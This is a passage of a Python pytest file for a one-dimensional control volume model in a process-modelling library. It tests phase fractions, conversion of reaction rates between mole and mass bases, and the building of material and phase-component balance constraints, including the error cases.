        "transformation_method": "dae.finite_difference",
        "transformation_scheme": "BACKWARD",
        "finite_elements": 10,
        "reaction_package_args": {"test1": 1}})

    m.fs.cv.add_geometry()
    m.fs.cv.add_state_blocks(has_phase_equilibrium=False)
    m.fs.cv.add_reaction_blocks(has_equilibrium=False)

    assert m.fs.cv.reactions[0, 0].config.test1 == 1
# -----------------------------------------------------------------------------
# Test _add_phase_fractions
@pytest.mark.unit
def test_add_phase_fractions():
    """With multiple phases, _add_phase_fractions creates a phase_fraction Var
    (2 points x 2 phases = 4 entries) plus a sum-to-one constraint."""
    m = ConcreteModel()
    m.fs = Flowsheet(default={"dynamic": False})
    m.fs.pp = PhysicalParameterTestBlock()
    m.fs.rp = ReactionParameterTestBlock(default={"property_package": m.fs.pp})
    m.fs.cv = ControlVolume1DBlock(default={
        "property_package": m.fs.pp,
        "reaction_package": m.fs.rp,
        "transformation_method": "dae.finite_difference",
        "transformation_scheme": "BACKWARD",
        "finite_elements": 10})

    m.fs.cv.add_geometry()
    m.fs.cv.add_state_blocks(has_phase_equilibrium=False)
    m.fs.cv._add_phase_fractions()

    assert isinstance(m.fs.cv.phase_fraction, Var)
    assert len(m.fs.cv.phase_fraction) == 4
    assert isinstance(m.fs.cv.sum_of_phase_fractions, Constraint)
@pytest.mark.unit
def test_add_phase_fractions_single_phase():
    """With a single phase, phase_fraction is a trivial Expression (fixed at
    1, presumably) and no sum constraint is created."""
    m = ConcreteModel()
    m.fs = Flowsheet(default={"dynamic": False})
    m.fs.pp = PhysicalParameterTestBlock()
    # Replace the default two-phase list with a single phase
    m.fs.pp.del_component(m.fs.pp.phase_list)
    m.fs.pp.phase_list = Set(initialize=["p1"])
    m.fs.rp = ReactionParameterTestBlock(default={"property_package": m.fs.pp})
    m.fs.cv = ControlVolume1DBlock(default={
        "property_package": m.fs.pp,
        "reaction_package": m.fs.rp,
        "transformation_method": "dae.finite_difference",
        "transformation_scheme": "BACKWARD",
        "finite_elements": 10})

    m.fs.cv.add_geometry()
    m.fs.cv.add_state_blocks(has_phase_equilibrium=False)
    m.fs.cv._add_phase_fractions()

    assert isinstance(m.fs.cv.phase_fraction, Expression)
    assert len(m.fs.cv.phase_fraction) == 2
    assert not hasattr(m.fs.cv, "sum_of_phase_fractions")
# -----------------------------------------------------------------------------
# Test reaction rate conversion method
@pytest.mark.unit
def test_rxn_rate_conv_no_rxns():
    """Without rate reactions, _rxn_rate_conv returns 1 regardless of the
    (here undefined, basis_switch=3) property basis."""
    m = ConcreteModel()
    m.fs = Flowsheet(default={"dynamic": False})
    m.fs.pp = PhysicalParameterTestBlock()
    m.fs.pp.basis_switch = 3
    m.fs.rp = ReactionParameterTestBlock(default={"property_package": m.fs.pp})
    m.fs.cv = ControlVolume1DBlock(default={
        "property_package": m.fs.pp,
        "reaction_package": m.fs.rp,
        "transformation_method": "dae.finite_difference",
        "transformation_scheme": "BACKWARD",
        "finite_elements": 10})

    m.fs.cv.add_geometry()
    m.fs.cv.add_state_blocks(has_phase_equilibrium=True)
    m.fs.cv.add_reaction_blocks(has_equilibrium=False)

    for t in m.fs.time:
        for x in m.fs.cv.length_domain:
            for j in m.fs.pp.component_list:
                assert m.fs.cv._rxn_rate_conv(
                    t, x, j, has_rate_reactions=False) == 1
@pytest.mark.unit
def test_rxn_rate_conv_property_basis_other():
    """An unrecognized property-package basis (basis_switch=3) raises
    ConfigurationError when rate reactions are present."""
    m = ConcreteModel()
    m.fs = Flowsheet(default={"dynamic": False})
    m.fs.pp = PhysicalParameterTestBlock()
    m.fs.pp.basis_switch = 3
    m.fs.rp = ReactionParameterTestBlock(default={"property_package": m.fs.pp})
    m.fs.cv = ControlVolume1DBlock(default={
        "property_package": m.fs.pp,
        "reaction_package": m.fs.rp,
        "transformation_method": "dae.finite_difference",
        "transformation_scheme": "BACKWARD",
        "finite_elements": 10})

    m.fs.cv.add_geometry()
    m.fs.cv.add_state_blocks(has_phase_equilibrium=True)
    m.fs.cv.add_reaction_blocks(has_equilibrium=False)

    for t in m.fs.time:
        for x in m.fs.cv.length_domain:
            for j in m.fs.pp.component_list:
                with pytest.raises(ConfigurationError):
                    m.fs.cv._rxn_rate_conv(t, x, j, has_rate_reactions=True)
@pytest.mark.unit
def test_rxn_rate_conv_reaction_basis_other():
    """An unrecognized reaction-package basis (basis_switch=3) raises
    ConfigurationError when rate reactions are present."""
    m = ConcreteModel()
    m.fs = Flowsheet(default={"dynamic": False})
    m.fs.pp = PhysicalParameterTestBlock()
    m.fs.rp = ReactionParameterTestBlock(default={"property_package": m.fs.pp})
    m.fs.rp.basis_switch = 3
    m.fs.cv = ControlVolume1DBlock(default={
        "property_package": m.fs.pp,
        "reaction_package": m.fs.rp,
        "transformation_method": "dae.finite_difference",
        "transformation_scheme": "BACKWARD",
        "finite_elements": 10})

    m.fs.cv.add_geometry()
    m.fs.cv.add_state_blocks(has_phase_equilibrium=True)
    m.fs.cv.add_reaction_blocks(has_equilibrium=False)

    for t in m.fs.time:
        for x in m.fs.cv.length_domain:
            for j in m.fs.pp.component_list:
                with pytest.raises(ConfigurationError):
                    m.fs.cv._rxn_rate_conv(t, x, j, has_rate_reactions=True)
@pytest.mark.unit
def test_rxn_rate_conv_both_molar():
    """Matching (default molar) bases need no conversion: factor is 1."""
    model = ConcreteModel()
    model.fs = Flowsheet(default={"dynamic": False})
    model.fs.pp = PhysicalParameterTestBlock()
    model.fs.rp = ReactionParameterTestBlock(
        default={"property_package": model.fs.pp})
    cv_config = {
        "property_package": model.fs.pp,
        "reaction_package": model.fs.rp,
        "transformation_method": "dae.finite_difference",
        "transformation_scheme": "BACKWARD",
        "finite_elements": 10,
    }
    model.fs.cv = ControlVolume1DBlock(default=cv_config)

    model.fs.cv.add_geometry()
    model.fs.cv.add_state_blocks(has_phase_equilibrium=True)
    model.fs.cv.add_reaction_blocks(has_equilibrium=False)

    for t in model.fs.time:
        for x in model.fs.cv.length_domain:
            for j in model.fs.pp.component_list:
                conv = model.fs.cv._rxn_rate_conv(
                    t, x, j, has_rate_reactions=True)
                assert conv == 1
@pytest.mark.unit
def test_rxn_rate_conv_both_mass():
    """Matching mass bases (basis_switch=2 on both packages) need no
    conversion: factor is 1."""
    m = ConcreteModel()
    m.fs = Flowsheet(default={"dynamic": False})
    m.fs.pp = PhysicalParameterTestBlock()
    m.fs.rp = ReactionParameterTestBlock(default={"property_package": m.fs.pp})
    m.fs.pp.basis_switch = 2
    m.fs.rp.basis_switch = 2
    m.fs.cv = ControlVolume1DBlock(default={
        "property_package": m.fs.pp,
        "reaction_package": m.fs.rp,
        "transformation_method": "dae.finite_difference",
        "transformation_scheme": "BACKWARD",
        "finite_elements": 10})

    m.fs.cv.add_geometry()
    m.fs.cv.add_state_blocks(has_phase_equilibrium=True)
    m.fs.cv.add_reaction_blocks(has_equilibrium=False)

    for t in m.fs.time:
        for x in m.fs.cv.length_domain:
            for j in m.fs.pp.component_list:
                assert m.fs.cv._rxn_rate_conv(
                    t, x, j, has_rate_reactions=True) == 1
@pytest.mark.unit
def test_rxn_rate_conv_mole_mass_no_mw():
    """Mole property basis with mass reaction basis requires mw_comp on the
    state block; its absence raises PropertyNotSupportedError."""
    m = ConcreteModel()
    m.fs = Flowsheet(default={"dynamic": False})
    m.fs.pp = PhysicalParameterTestBlock()
    m.fs.rp = ReactionParameterTestBlock(default={"property_package": m.fs.pp})
    m.fs.pp.basis_switch = 1
    m.fs.rp.basis_switch = 2
    m.fs.cv = ControlVolume1DBlock(default={
        "property_package": m.fs.pp,
        "reaction_package": m.fs.rp,
        "transformation_method": "dae.finite_difference",
        "transformation_scheme": "BACKWARD",
        "finite_elements": 10})

    m.fs.cv.add_geometry()
    m.fs.cv.add_state_blocks(has_phase_equilibrium=True)
    m.fs.cv.add_reaction_blocks(has_equilibrium=False)

    for t in m.fs.time:
        for x in m.fs.cv.length_domain:
            for j in m.fs.pp.component_list:
                with pytest.raises(PropertyNotSupportedError):
                    m.fs.cv._rxn_rate_conv(t, x, j, has_rate_reactions=True)
@pytest.mark.unit
def test_rxn_rate_conv_mass_mole_no_mw():
    """Mass property basis with mole reaction basis requires mw_comp on the
    state block; its absence raises PropertyNotSupportedError."""
    m = ConcreteModel()
    m.fs = Flowsheet(default={"dynamic": False})
    m.fs.pp = PhysicalParameterTestBlock()
    m.fs.rp = ReactionParameterTestBlock(default={"property_package": m.fs.pp})
    m.fs.pp.basis_switch = 2
    m.fs.rp.basis_switch = 1
    m.fs.cv = ControlVolume1DBlock(default={
        "property_package": m.fs.pp,
        "reaction_package": m.fs.rp,
        "transformation_method": "dae.finite_difference",
        "transformation_scheme": "BACKWARD",
        "finite_elements": 10})

    m.fs.cv.add_geometry()
    m.fs.cv.add_state_blocks(has_phase_equilibrium=True)
    m.fs.cv.add_reaction_blocks(has_equilibrium=False)

    for t in m.fs.time:
        for x in m.fs.cv.length_domain:
            for j in m.fs.pp.component_list:
                with pytest.raises(PropertyNotSupportedError):
                    m.fs.cv._rxn_rate_conv(t, x, j, has_rate_reactions=True)
@pytest.mark.unit
def test_rxn_rate_conv_mole_mass():
    """Mole property basis + mass reaction basis converts by 1/mw_comp[j]."""
    m = ConcreteModel()
    m.fs = Flowsheet(default={"dynamic": False})
    m.fs.pp = PhysicalParameterTestBlock()
    m.fs.rp = ReactionParameterTestBlock(default={"property_package": m.fs.pp})
    m.fs.pp.basis_switch = 1
    m.fs.rp.basis_switch = 2
    m.fs.cv = ControlVolume1DBlock(default={
        "property_package": m.fs.pp,
        "reaction_package": m.fs.rp,
        "transformation_method": "dae.finite_difference",
        "transformation_scheme": "BACKWARD",
        "finite_elements": 10})

    m.fs.cv.add_geometry()
    m.fs.cv.add_state_blocks(has_phase_equilibrium=True)
    m.fs.cv.add_reaction_blocks(has_equilibrium=False)

    for t in m.fs.time:
        for x in m.fs.cv.length_domain:
            # Supply molecular weights so the conversion can be evaluated
            m.fs.cv.properties[t, x].mw_comp = {"c1": 2, "c2": 3}
            for j in m.fs.pp.component_list:
                assert (m.fs.cv._rxn_rate_conv(
                        t, x, j, has_rate_reactions=True) ==
                    1/m.fs.cv.properties[t, x].mw_comp[j])
@pytest.mark.unit
def test_rxn_rate_conv_mass_mole():
    """Mass property basis + mole reaction basis converts by mw_comp[j]."""
    m = ConcreteModel()
    m.fs = Flowsheet(default={"dynamic": False})
    m.fs.pp = PhysicalParameterTestBlock()
    m.fs.rp = ReactionParameterTestBlock(default={"property_package": m.fs.pp})
    m.fs.pp.basis_switch = 2
    m.fs.rp.basis_switch = 1
    m.fs.cv = ControlVolume1DBlock(default={
        "property_package": m.fs.pp,
        "reaction_package": m.fs.rp,
        "transformation_method": "dae.finite_difference",
        "transformation_scheme": "BACKWARD",
        "finite_elements": 10})

    m.fs.cv.add_geometry()
    m.fs.cv.add_state_blocks(has_phase_equilibrium=True)
    m.fs.cv.add_reaction_blocks(has_equilibrium=False)

    for t in m.fs.time:
        for x in m.fs.cv.length_domain:
            # Supply molecular weights so the conversion can be evaluated
            m.fs.cv.properties[t, x].mw_comp = {"c1": 2, "c2": 3}
            for j in m.fs.pp.component_list:
                assert (m.fs.cv._rxn_rate_conv(
                        t, x, j, has_rate_reactions=True) ==
                    m.fs.cv.properties[t, x].mw_comp[j])
# -----------------------------------------------------------------------------
# Test add_material_balances default
@pytest.mark.unit
def test_add_material_balances_default_fail():
    """useDefault balance type raises ConfigurationError when the property
    package reports an unusable default (default_balance_switch=2)."""
    m = ConcreteModel()
    m.fs = Flowsheet(default={"dynamic": False})
    m.fs.pp = PhysicalParameterTestBlock()
    m.fs.rp = ReactionParameterTestBlock(default={"property_package": m.fs.pp})
    m.fs.cv = ControlVolume1DBlock(default={
        "property_package": m.fs.pp,
        "reaction_package": m.fs.rp,
        "transformation_method": "dae.finite_difference",
        "transformation_scheme": "BACKWARD",
        "finite_elements": 10})

    m.fs.cv.add_geometry()
    m.fs.cv.add_state_blocks(has_phase_equilibrium=False)
    m.fs.cv.add_reaction_blocks(has_equilibrium=False)

    m.fs.pp.default_balance_switch = 2

    with pytest.raises(ConfigurationError):
        m.fs.cv.add_material_balances(MaterialBalanceType.useDefault)
@pytest.mark.unit
def test_add_material_balances_default():
    """useDefault material balances build 4 constraints; with a BACKWARD
    scheme the inlet point x=0 has no balance (KeyError) while x=1 does."""
    m = ConcreteModel()
    m.fs = Flowsheet(default={"dynamic": False})
    m.fs.pp = PhysicalParameterTestBlock()
    m.fs.rp = ReactionParameterTestBlock(default={"property_package": m.fs.pp})
    m.fs.cv = ControlVolume1DBlock(default={
        "property_package": m.fs.pp,
        "reaction_package": m.fs.rp,
        "transformation_method": "dae.finite_difference",
        "transformation_scheme": "BACKWARD",
        "finite_elements": 10})

    m.fs.cv.add_geometry()
    m.fs.cv.add_state_blocks(has_phase_equilibrium=False)
    m.fs.cv.add_reaction_blocks(has_equilibrium=False)

    mb = m.fs.cv.add_material_balances(MaterialBalanceType.useDefault)

    assert isinstance(mb, Constraint)
    assert len(mb) == 4
    for p in m.fs.pp.phase_list:
        for j in m.fs.pp.component_list:
            with pytest.raises(KeyError):
                assert m.fs.cv.material_balances[0, 0, p, j]
            assert type(m.fs.cv.material_balances[0, 1, p, j]) is \
                _GeneralConstraintData

    assert_units_consistent(m)
# -----------------------------------------------------------------------------
# Test add_phase_component_balances
@pytest.mark.unit
def test_add_phase_component_balances_default():
    """Phase-component balances with a BACKWARD scheme: 4 constraints,
    none at the inlet point x=0."""
    m = ConcreteModel()
    m.fs = Flowsheet(default={"dynamic": False})
    m.fs.pp = PhysicalParameterTestBlock()
    m.fs.rp = ReactionParameterTestBlock(default={"property_package": m.fs.pp})
    m.fs.cv = ControlVolume1DBlock(default={
        "property_package": m.fs.pp,
        "reaction_package": m.fs.rp,
        "transformation_method": "dae.finite_difference",
        "transformation_scheme": "BACKWARD",
        "finite_elements": 10})

    m.fs.cv.add_geometry()
    m.fs.cv.add_state_blocks(has_phase_equilibrium=False)
    m.fs.cv.add_reaction_blocks(has_equilibrium=False)

    mb = m.fs.cv.add_phase_component_balances()

    assert isinstance(mb, Constraint)
    assert len(mb) == 4
    for p in m.fs.pp.phase_list:
        for j in m.fs.pp.component_list:
            with pytest.raises(KeyError):
                assert m.fs.cv.material_balances[0, 0, p, j]
            assert type(m.fs.cv.material_balances[0, 1, p, j]) is \
                _GeneralConstraintData

    assert_units_consistent(m)
@pytest.mark.unit
def test_add_phase_component_balances_default_FFD():
    """With a FORWARD scheme the skipped boundary flips: no balance at x=1,
    balance present at x=0."""
    m = ConcreteModel()
    m.fs = Flowsheet(default={"dynamic": False})
    m.fs.pp = PhysicalParameterTestBlock()
    m.fs.rp = ReactionParameterTestBlock(default={"property_package": m.fs.pp})
    m.fs.cv = ControlVolume1DBlock(default={
        "property_package": m.fs.pp,
        "reaction_package": m.fs.rp,
        "transformation_method": "dae.finite_difference",
        "transformation_scheme": "FORWARD",
        "finite_elements": 10})

    m.fs.cv.add_geometry()
    m.fs.cv.add_state_blocks(has_phase_equilibrium=False)
    m.fs.cv.add_reaction_blocks(has_equilibrium=False)

    mb = m.fs.cv.add_phase_component_balances()

    assert isinstance(mb, Constraint)
    assert len(mb) == 4
    for p in m.fs.pp.phase_list:
        for j in m.fs.pp.component_list:
            with pytest.raises(KeyError):
                assert m.fs.cv.material_balances[0, 1, p, j]
            assert type(m.fs.cv.material_balances[0, 0, p, j]) is \
                _GeneralConstraintData

    assert_units_consistent(m)
@pytest.mark.unit
# NOTE(review): "distrubuted" is a typo for "distributed"; left unchanged so
# existing pytest selections / CI references keep working.
def test_add_phase_component_balances_distrubuted_area():
    """Balances also build when area is a distributed variable
    (DistributedVars.variant)."""
    m = ConcreteModel()
    m.fs = Flowsheet(default={"dynamic": False})
    m.fs.pp = PhysicalParameterTestBlock()
    m.fs.rp = ReactionParameterTestBlock(default={"property_package": m.fs.pp})
    m.fs.cv = ControlVolume1DBlock(default={
        "property_package": m.fs.pp,
        "reaction_package": m.fs.rp,
        "transformation_method": "dae.finite_difference",
        "transformation_scheme": "BACKWARD",
        "finite_elements": 10,
        "area_definition": DistributedVars.variant})

    m.fs.cv.add_geometry()
    m.fs.cv.add_state_blocks(has_phase_equilibrium=False)
    m.fs.cv.add_reaction_blocks(has_equilibrium=False)

    mb = m.fs.cv.add_phase_component_balances()

    assert isinstance(mb, Constraint)
    assert len(mb) == 4

    assert_units_consistent(m)
@pytest.mark.unit
def test_add_phase_component_balances_dynamic():
    """Dynamic flowsheets add holdup/accumulation Vars and double the
    constraint count (two time points)."""
    m = ConcreteModel()
    m.fs = Flowsheet(default={"dynamic": True, "time_units": units.s})
    m.fs.pp = PhysicalParameterTestBlock()
    m.fs.rp = ReactionParameterTestBlock(default={"property_package": m.fs.pp})
    m.fs.cv = ControlVolume1DBlock(default={
        "property_package": m.fs.pp,
        "reaction_package": m.fs.rp,
        "transformation_method": "dae.finite_difference",
        "transformation_scheme": "BACKWARD",
        "finite_elements": 10,
        "dynamic": True})

    m.fs.cv.add_geometry()
    m.fs.cv.add_state_blocks(has_phase_equilibrium=False)
    m.fs.cv.add_reaction_blocks(has_equilibrium=False)

    mb = m.fs.cv.add_phase_component_balances()

    assert isinstance(mb, Constraint)
    assert len(mb) == 8
    assert isinstance(m.fs.cv.phase_fraction, Var)
    assert isinstance(m.fs.cv.material_holdup, Var)
    assert isinstance(m.fs.cv.material_accumulation, Var)

    assert_units_consistent(m)
@pytest.mark.unit
def test_add_phase_component_balances_rate_rxns():
    """has_rate_reactions=True adds generation/extent Vars and a
    stoichiometry constraint."""
    m = ConcreteModel()
    m.fs = Flowsheet(default={"dynamic": False})
    m.fs.pp = PhysicalParameterTestBlock()
    m.fs.rp = ReactionParameterTestBlock(default={"property_package": m.fs.pp})
    m.fs.cv = ControlVolume1DBlock(default={
        "property_package": m.fs.pp,
        "reaction_package": m.fs.rp,
        "transformation_method": "dae.finite_difference",
        "transformation_scheme": "BACKWARD",
        "finite_elements": 10})

    m.fs.cv.add_geometry()
    m.fs.cv.add_state_blocks(has_phase_equilibrium=False)
    m.fs.cv.add_reaction_blocks(has_equilibrium=False)

    mb = m.fs.cv.add_phase_component_balances(has_rate_reactions=True)

    assert isinstance(mb, Constraint)
    assert len(mb) == 4
    assert isinstance(m.fs.cv.rate_reaction_generation, Var)
    assert isinstance(m.fs.cv.rate_reaction_extent, Var)
    assert isinstance(m.fs.cv.rate_reaction_stoichiometry_constraint,
                      Constraint)

    assert_units_consistent(m)
@pytest.mark.unit
def test_add_phase_component_balances_rate_rxns_no_ReactionBlock():
    """Requesting rate reactions without a reaction package / reaction
    blocks raises ConfigurationError."""
    model = ConcreteModel()
    model.fs = Flowsheet(default={"dynamic": False})
    model.fs.pp = PhysicalParameterTestBlock()
    model.fs.rp = ReactionParameterTestBlock(
        default={"property_package": model.fs.pp})
    # Note: no "reaction_package" entry — that is the point of this test.
    cv_config = {
        "property_package": model.fs.pp,
        "transformation_method": "dae.finite_difference",
        "transformation_scheme": "BACKWARD",
        "finite_elements": 10,
    }
    model.fs.cv = ControlVolume1DBlock(default=cv_config)

    model.fs.cv.add_geometry()
    model.fs.cv.add_state_blocks(has_phase_equilibrium=False)

    with pytest.raises(ConfigurationError):
        model.fs.cv.add_phase_component_balances(has_rate_reactions=True)
@pytest.mark.unit
def test_add_phase_component_balances_rate_rxns_no_rxn_idx():
    """A reaction package missing rate_reaction_idx raises
    PropertyNotSupportedError for rate reactions."""
    m = ConcreteModel()
    m.fs = Flowsheet(default={"dynamic": False})
    m.fs.pp = PhysicalParameterTestBlock()
    m.fs.rp = ReactionParameterTestBlock(default={"property_package": m.fs.pp})
    # Remove the rate reaction index set to trigger the error path
    m.fs.rp.del_component(m.fs.rp.rate_reaction_idx)
    m.fs.cv = ControlVolume1DBlock(default={
        "property_package": m.fs.pp,
        "reaction_package": m.fs.rp,
        "transformation_method": "dae.finite_difference",
        "transformation_scheme": "BACKWARD",
        "finite_elements": 10})

    m.fs.cv.add_geometry()
    m.fs.cv.add_state_blocks(has_phase_equilibrium=False)
    m.fs.cv.add_reaction_blocks(has_equilibrium=False)

    with pytest.raises(PropertyNotSupportedError):
        m.fs.cv.add_phase_component_balances(has_rate_reactions=True)
@pytest.mark.unit
def test_add_phase_component_balances_eq_rxns():
    """has_equilibrium_reactions=True adds equilibrium generation/extent
    Vars and a stoichiometry constraint."""
    m = ConcreteModel()
    m.fs = Flowsheet(default={"dynamic": False})
    m.fs.pp = PhysicalParameterTestBlock()
    m.fs.rp = ReactionParameterTestBlock(default={"property_package": m.fs.pp})
    m.fs.cv = ControlVolume1DBlock(default={
        "property_package": m.fs.pp,
        "reaction_package": m.fs.rp,
        "transformation_method": "dae.finite_difference",
        "transformation_scheme": "BACKWARD",
        "finite_elements": 10})

    m.fs.cv.add_geometry()
    m.fs.cv.add_state_blocks(has_phase_equilibrium=False)
    m.fs.cv.add_reaction_blocks(has_equilibrium=True)

    mb = m.fs.cv.add_phase_component_balances(has_equilibrium_reactions=True)

    assert isinstance(mb, Constraint)
    assert len(mb) == 4
    assert isinstance(m.fs.cv.equilibrium_reaction_generation, Var)
    assert isinstance(m.fs.cv.equilibrium_reaction_extent, Var)
    assert isinstance(m.fs.cv.equilibrium_reaction_stoichiometry_constraint,
                      Constraint)

    assert_units_consistent(m)
@pytest.mark.unit
def test_add_phase_component_balances_eq_rxns_not_active():
    """Equilibrium reactions in the balance require reaction blocks built
    with has_equilibrium=True; otherwise ConfigurationError."""
    m = ConcreteModel()
    m.fs = Flowsheet(default={"dynamic": False})
    m.fs.pp = PhysicalParameterTestBlock()
    m.fs.rp = ReactionParameterTestBlock(default={"property_package": m.fs.pp})
    m.fs.cv = ControlVolume1DBlock(default={
        "property_package": m.fs.pp,
        "reaction_package": m.fs.rp,
        "transformation_method": "dae.finite_difference",
        "transformation_scheme": "BACKWARD",
        "finite_elements": 10})

    m.fs.cv.add_geometry()
    m.fs.cv.add_state_blocks(has_phase_equilibrium=False)
    m.fs.cv.add_reaction_blocks(has_equilibrium=False)

    with pytest.raises(ConfigurationError):
        m.fs.cv.add_phase_component_balances(has_equilibrium_reactions=True)
@pytest.mark.unit
def test_add_phase_component_balances_eq_rxns_no_idx():
    """A reaction package missing equilibrium_reaction_idx raises
    PropertyNotSupportedError for equilibrium reactions."""
    m = ConcreteModel()
    m.fs = Flowsheet(default={"dynamic": False})
    m.fs.pp = PhysicalParameterTestBlock()
    m.fs.rp = ReactionParameterTestBlock(default={"property_package": m.fs.pp})
    # Remove the equilibrium reaction index set to trigger the error path
    m.fs.rp.del_component(m.fs.rp.equilibrium_reaction_idx)
    m.fs.cv = ControlVolume1DBlock(default={
        "property_package": m.fs.pp,
        "reaction_package": m.fs.rp,
        "transformation_method": "dae.finite_difference",
        "transformation_scheme": "BACKWARD",
        "finite_elements": 10})

    m.fs.cv.add_geometry()
    m.fs.cv.add_state_blocks(has_phase_equilibrium=False)
    m.fs.cv.add_reaction_blocks(has_equilibrium=True)

    with pytest.raises(PropertyNotSupportedError):
        m.fs.cv.add_phase_component_balances(has_equilibrium_reactions=True)
@pytest.mark.unit
def test_add_phase_component_balances_eq_rxns_no_ReactionBlock():
    """Equilibrium reactions without a reaction package / reaction blocks
    raise ConfigurationError."""
    m = ConcreteModel()
    m.fs = Flowsheet(default={"dynamic": False})
    m.fs.pp = PhysicalParameterTestBlock()
    m.fs.rp = ReactionParameterTestBlock(default={"property_package": m.fs.pp})
    # Note: no "reaction_package" entry — that is the point of this test.
    m.fs.cv = ControlVolume1DBlock(default={
        "property_package": m.fs.pp,
        "transformation_method": "dae.finite_difference",
        "transformation_scheme": "BACKWARD",
        "finite_elements": 10})

    m.fs.cv.add_geometry()
    m.fs.cv.add_state_blocks(has_phase_equilibrium=False)

    with pytest.raises(ConfigurationError):
        m.fs.cv.add_phase_component_balances(has_equilibrium_reactions=True)
@pytest.mark.unit
def test_add_phase_component_balances_phase_eq():
    """has_phase_equilibrium=True in the balance adds a
    phase_equilibrium_generation Var."""
    m = ConcreteModel()
    m.fs = Flowsheet(default={"dynamic": False})
    m.fs.pp = PhysicalParameterTestBlock()
    m.fs.rp = ReactionParameterTestBlock(default={"property_package": m.fs.pp})
    m.fs.cv = ControlVolume1DBlock(default={
        "property_package": m.fs.pp,
        "reaction_package": m.fs.rp,
        "transformation_method": "dae.finite_difference",
        "transformation_scheme": "BACKWARD",
        "finite_elements": 10})

    m.fs.cv.add_geometry()
    m.fs.cv.add_state_blocks(has_phase_equilibrium=True)
    m.fs.cv.add_reaction_blocks(has_equilibrium=False)

    mb = m.fs.cv.add_phase_component_balances(has_phase_equilibrium=True)

    assert isinstance(mb, Constraint)
    assert len(mb) == 4
    assert isinstance(m.fs.cv.phase_equilibrium_generation, Var)

    assert_units_consistent(m)
@pytest.mark.unit
def test_add_phase_component_balances_phase_eq_not_active():
    """Phase equilibrium in the balance requires state blocks built with
    has_phase_equilibrium=True; otherwise ConfigurationError."""
    m = ConcreteModel()
    m.fs = Flowsheet(default={"dynamic": False})
    m.fs.pp = PhysicalParameterTestBlock()
    m.fs.rp = ReactionParameterTestBlock(default={"property_package": m.fs.pp})
    m.fs.cv = ControlVolume1DBlock(default={
        "property_package": m.fs.pp,
        "reaction_package": m.fs.rp,
        "transformation_method": "dae.finite_difference",
        "transformation_scheme": "BACKWARD",
        "finite_elements": 10})

    m.fs.cv.add_geometry()
    m.fs.cv.add_state_blocks(has_phase_equilibrium=False)
    m.fs.cv.add_reaction_blocks(has_equilibrium=False)

    with pytest.raises(ConfigurationError):
        m.fs.cv.add_phase_component_balances(has_phase_equilibrium=True)
@pytest.mark.unit
def test_add_phase_component_balances_phase_eq_no_idx():
    """A property package missing phase_equilibrium_idx raises
    PropertyNotSupportedError when phase equilibrium is requested."""
    m = ConcreteModel()
    m.fs = Flowsheet(default={"dynamic": False})
    m.fs.pp = PhysicalParameterTestBlock()
    m.fs.rp = ReactionParameterTestBlock(default={"property_package": m.fs.pp})
    # Remove the phase equilibrium index set to trigger the error path
    m.fs.pp.del_component(m.fs.pp.phase_equilibrium_idx)
    m.fs.cv = ControlVolume1DBlock(default={
        "property_package": m.fs.pp,
        "reaction_package": m.fs.rp,
        "transformation_method": "dae.finite_difference",
        "transformation_scheme": "BACKWARD",
        "finite_elements": 10})

    m.fs.cv.add_geometry()
    m.fs.cv.add_state_blocks(has_phase_equilibrium=True)
    m.fs.cv.add_reaction_blocks(has_equilibrium=False)

    with pytest.raises(PropertyNotSupportedError):
        m.fs.cv.add_phase_component_balances(has_phase_equilibrium=True)
@pytest.mark.unit
def test_add_phase_component_balances_mass_transfer():
    """has_mass_transfer=True adds a mass_transfer_term Var."""
    m = ConcreteModel()
    m.fs = Flowsheet(default={"dynamic": False})
    m.fs.pp = PhysicalParameterTestBlock()
    m.fs.rp = ReactionParameterTestBlock(default={"property_package": m.fs.pp})
    m.fs.cv = ControlVolume1DBlock(default={
        "property_package": m.fs.pp,
        "reaction_package": m.fs.rp,
        "transformation_method": "dae.finite_difference",
        "transformation_scheme": "BACKWARD",
        "finite_elements": 10})

    m.fs.cv.add_geometry()
    m.fs.cv.add_state_blocks(has_phase_equilibrium=False)
    m.fs.cv.add_reaction_blocks(has_equilibrium=False)

    mb = m.fs.cv.add_phase_component_balances(has_mass_transfer=True)

    assert isinstance(mb, Constraint)
    assert len(mb) == 4
    assert isinstance(m.fs.cv.mass_transfer_term, Var)

    assert_units_consistent(m)
@pytest.mark.unit
def test_add_phase_component_balances_custom_molar_term():
    """A custom molar term callable (with mol/s/m units) is accepted and
    the balances build with consistent units."""
    m = ConcreteModel()
    m.fs = Flowsheet(default={"dynamic": False})
    m.fs.pp = PhysicalParameterTestBlock()
    m.fs.rp = ReactionParameterTestBlock(default={"property_package": m.fs.pp})
    m.fs.cv = ControlVolume1DBlock(default={
        "property_package": m.fs.pp,
        "reaction_package": m.fs.rp,
        "transformation_method": "dae.finite_difference",
        "transformation_scheme": "BACKWARD",
        "finite_elements": 10})

    m.fs.cv.add_geometry()
    m.fs.cv.add_state_blocks(has_phase_equilibrium=False)
    m.fs.cv.add_reaction_blocks(has_equilibrium=False)

    m.fs.cv.test_var = Var(m.fs.cv.flowsheet().config.time,
                           m.fs.pp.phase_list,
                           m.fs.pp.component_list)

    def custom_method(t, x, p, j):
        # Custom term must carry molar flow per length units
        return m.fs.cv.test_var[t, p, j]*units.mol/units.s/units.m

    mb = m.fs.cv.add_phase_component_balances(custom_molar_term=custom_method)

    assert isinstance(mb, Constraint)
    assert len(mb) == 4

    assert_units_consistent(m)
@pytest.mark.unit
def test_add_phase_component_balances_custom_molar_term_no_mw():
    """A custom molar term on a mass-basis property package (basis_switch=2)
    needs mw_comp to convert; its absence raises PropertyNotSupportedError."""
    m = ConcreteModel()
    m.fs = Flowsheet(default={"dynamic": False})
    m.fs.pp = PhysicalParameterTestBlock()
    m.fs.pp.basis_switch = 2
    m.fs.rp = ReactionParameterTestBlock(default={"property_package": m.fs.pp})
    m.fs.cv = ControlVolume1DBlock(default={
        "property_package": m.fs.pp,
        "reaction_package": m.fs.rp,
        "transformation_method": "dae.finite_difference",
        "transformation_scheme": "BACKWARD",
        "finite_elements": 10})

    m.fs.cv.add_geometry()
    m.fs.cv.add_state_blocks(has_phase_equilibrium=False)
    m.fs.cv.add_reaction_blocks(has_equilibrium=False)

    m.fs.cv.test_var = Var(m.fs.cv.flowsheet().config.time,
                           m.fs.pp.phase_list,
                           m.fs.pp.component_list)

    def custom_method(t, x, p, j):
        return m.fs.cv.test_var[t, p, j]

    with pytest.raises(PropertyNotSupportedError):
        m.fs.cv.add_phase_component_balances(custom_molar_term=custom_method)
@pytest.mark.unit
def test_add_phase_component_balances_custom_molar_term_mass_flow_basis():
